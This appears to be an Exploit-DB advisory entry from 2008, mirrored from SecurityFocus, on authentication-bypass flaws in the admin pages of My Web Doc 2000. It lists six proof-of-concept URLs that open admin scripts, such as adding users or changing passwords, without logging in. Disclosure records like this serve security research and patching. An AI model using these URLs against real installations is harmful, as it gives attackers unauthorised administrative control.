My Web Doc 2000 Administration Pages - Multiple Authentication Bypass Vulnerabilities

EDB-ID:

31468

CVE:

N/A


Author:

ZoRLu

Type:

webapps


Platform:

PHP

Date:

2008-03-22


source: https://www.securityfocus.com/bid/28400/info

My Web Doc is prone to multiple authentication-bypass vulnerabilities.

Attackers can leverage these issues to compromise the application, which could aid in other attacks.

My Web Doc 2000 Final is vulnerable; other versions may also be affected. 

http://www.example.com/mywebdocadd.php3?x
http://www.example.com/mywebdoccalendaradd.php3?x
http://www.example.com/mywebdoclisting.php3?x
http://www.example.com/mywebdocchangepassword.php3?x
http://www.example.com/mywebdocadduser.php3?x
http://www.example.com/mywebdocuserlisting.php3?x